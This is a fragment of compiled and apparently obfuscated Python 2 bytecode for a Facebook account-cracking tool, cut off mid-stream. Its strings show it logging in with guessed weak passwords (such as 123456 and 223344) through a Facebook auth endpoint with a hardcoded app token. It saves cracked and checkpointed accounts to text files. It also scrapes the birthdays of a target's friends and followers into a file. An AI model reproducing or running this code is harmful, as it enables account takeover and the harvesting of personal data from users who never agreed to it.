17GH\x88\x01\x00j\x0b\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\x1e\x06|\x03\x00d\x18\x00\x17}\x08\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xbc\x01d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nz\x05d\x13\x00|\x06\x00k\x06\x00r\x1f\x02d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x17\x05|\x03\x00d\x1f\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xc3\x02d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ns\x04d\x13\x00|\x06\x00k\x06\x00r&\x03d \x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x10\x04|\x03\x00d!\x00\x17}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xca\x03d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nl\x03d\x13\x00|\x06\x00k\x06\x00r-\x04d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\t\x03d"\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xcd\x04d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ni\x02d\x13\x00|\x06\x00k\x06\x00r0\x05d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x06\x02d#\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x05d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nf\x01d\x13\x00|\x06\x00k\x06\x00r3\x06d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x03\x01d$\x00}\x0f\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0f\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd3\x06d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nc\x00d\x13\x00|\x06\x00k\x06\x00r6\x07d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR@\x00\x00\x00t\x03\x00\x00\x00123s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=vi_vn&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705cR.\x00\x00\x00s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x96] \x1b[1;93mCEKPOINTs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93mR\x17\x00\x00\x00s-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;93ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93ms\x01\x00\x00\x00\ns\x10\x00\x00\x00out/super_cp.txtt\x01\x00\x00\x00as\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x0c\x00\x00\x00access_tokens\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mBERHASILs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92mt\x04\x00\x00\x001234s\x11\x00\x00\x00\x1b[1;93m[RAKA-CP] s\x03\x00\x00\x00 | s\x06\x00\x00\x00cp.txts\x18\x00\x00\x00\x1b[1;92m[RAKA-OK] \x1b[1;30ms\x06\x00\x00\x00\x1b[1;0ms\x06\x00\x00\x00ok.txtt\x05\x00\x00\x0012345s\x19\x00\x00\x00 \x1b[1;92m[RAKA-OK] \x1b[1;30mt\x06\x00\x00\x00123456t\x06\x00\x00\x00223344t\x06\x00\x00\x00334455t\x06\x00\x00\x00445566(\x0c\x00\x00\x00t\x05\x00\x00\x00splitR\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00bR\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x06\x00\x00\x00append(\x10\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userR7\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00pass1R*\x00\x00\x00t\x01\x00\x00\x00dt\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x02\x00\x00\x00cpR?\x00\x00\x00t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7(\x02\x00\x00\x00t\x03\x00\x00\x00cpst\x03\x00\x00\x00oks(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main$\x01\x00\x00s\xe0\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01(\x01\x0f\x01\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\r\x02\x0c\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x15\x00\x00\x00\x1b[1;93mTotal Cp/Ok : t\x01\x00\x00\x00/s\x1b\x00\x00\x00\x1b[1;93mPress enter to back (\x1d\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x0f\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00t\n\x00\x00\x00view_tokent\x0b\x00\x00\x00extract_dobR\x0b\x00\x00\x00t\x06\x00\x00\x00logoutR\x12\x00\x00\x00R\x13\x00\x00\x00R=\x00\x00\x00t\x03\x00\x00\x00strt\x03\x00\x00\x00lenR"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00map(\x0c\x00\x00\x00t\x06\x00\x00\x00selectR4\x00\x00\x00t\x03\x00\x00\x00idtR)\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00iR7\x00\x00\x00t\x02\x00\x00\x00naR+\x00\x00\x00Ra\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R=\x00\x00\x00\xc6\x00\x00\x00s\xce\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x03\x12\x80\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sO\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x02\x00GHt\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mLogged In Token \x1b[0;97ms\t\x00\x00\x00 Token : s\x11\x00\x00\x00cat .fb_token.txts\x1a\x00\x00\x00 Press enter to main menu (\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rc\x00\x00\x00\xb0\x01\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sQ\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHt\x05\x00d\x05\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x06\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0b\x00\x00\x00Logout Menus&\x00\x00\x00\x1b[1;93mDo you really want to logout ? s\x14\x00\x00\x00rm -rf .fb_token.txt(\x07\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x0b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Re\x00\x00\x00\xbb\x01\x00\x00s\x10\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\n\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x9a\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x05\x00GHt\r\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00Extract DOB Of IDs\x1f\x00\x00\x00\x1b[1;93m[1] Grab from friendlists\x1e\x00\x00\x00\x1b[1;93m[2] Grab from followerss\x19\x00\x00\x00\x1b[1;93m[3] Grab single ids\x0f\x00\x00\x00\x1b[1;93m[4] Back(\x0e\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00t\n\x00\x00\x00dob_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc4\x01\x00\x00s \x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s~\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00rV\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn5\x00\x04t\x0b\x00k\n\x00r\xce\x00\x01\x01\x01d\x04\x00GHd\x0c\x00t\x0c\x00\x17GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\xc7\x01|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\r\x01Wnv\x01|\x00\x00d\x14\x00k\x02\x00r\x8a\x02t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x15\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\x16\x00|\x04\x00d\x0b\x00\x19\x17GHWn\'\x00\x04t\x0b\x00k\n\x00r\xfe\x01\x01\x01\x01d\x17\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x18\x00\x17t\x06\x00\x17d\x19\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\x93\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qA\x02WnB\x00|\x00\x00d\x1a\x00k\x02\x00r\xa0\x02t\x10\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x1b\x00k\x02\x00r\xb6\x02t\x11\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x1c\x00GHd\x04\x00GHt\r\x00\x83\x00\x00\x01d\x1d\x00t\x12\x00t\x13\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1e\x00GHd\x1f\x00GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GH\x87\x00\x00f\x01\x00d"\x00\x86\x00\x00}\n\x00t\x14\x00d#\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHd$\x00GHd%\x00t\x12\x00t\x13\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHt\x00\x00d&\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00Ns\x14\x00\x00\x00\n Choose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s+\x00\x00\x00\t \x1b[1;32mGrab DOB From Friendlist\x1b[0;97ms\x0f\x00\x00\x00 Put Id/user : s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00s\x0c\x00\x00\x00Target Id : R\x17\x00\x00\x00s\x13\x00\x00\x00\x1b[1;31mID Not Founds\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s&\x00\x00\x00\x1b[1;32m Grab DOB From Followers\x1b[0;97ms\x0e\x00\x00\x00Target user : s\x1f\x00\x00\x00\t \x1b[1;31mID Not Found\x1b[0;97ms\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s&\x00\x00\x00\t \x1b[1;31mSelect valid option\x1b[0;97ms\x14\x00\x00\x00\x1b[1;93mTotal ID : s\x1e\x00\x00\x00\x1b[1;93mThe Process has starteds&\x00\x00\x00\x1b[1;93mNote : This is for testing onlyi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00s\xce\x00\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\xa5\x00t\x01\x00j\x02\x00d\x02\x00|\x02\x00\x17d\x03\x00\x17t\x03\x00\x17d\x04\x00t\x04\x00\x83\x01\x01j\x05\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00\x83\x01\x00}\x05\x00|\x05\x00d\x05\x00\x19}\x06\x00d\x06\x00|\x02\x00\x17d\x07\x00\x17|\x03\x00\x17d\x08\x00\x17|\x06\x00\x17d\t\x00\x17GHt\x08\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00|\x03\x00d\x08\x00\x17|\x02\x00\x17d\x08\x00\x17|\x06\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00t\x0c\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\r\x00\x00\x00NR@\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00t\x08\x00\x00\x00birthdays\x08\x00\x00\x00\x1b[1;32m s\t\x00\x00\x00 \x1b[1;30m s\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x08\x00\x00\x00dobs.txtRH\x00\x00\x00s\x01\x00\x00\x00\n(\r\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x06\x00\x00\x00number(\x08\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00R*\x00\x00\x00RV\x00\x00\x00t\x01\x00\x00\x00yt\x03\x00\x00\x00nmb(\x01\x00\x00\x00t\x03\x00\x00\x00nms(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\x19\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01$\x01\x0f\x01\n\x01\x1d\x01\x0f\x01!\x01\n\x01\x11\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x14\x00\x00\x00\x1b[1;93mTotal DOB : s\x16\x00\x00\x00\n Press enter to back (\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00t\x03\x00\x00\x00dobR\x0f\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x01\x00\x00\x00Rt\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ro\x00\x00\x00\xd6\x01\x00\x00s\x98\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\t\x01\x05\x01\n\x01\x0b\x01!\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x02%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x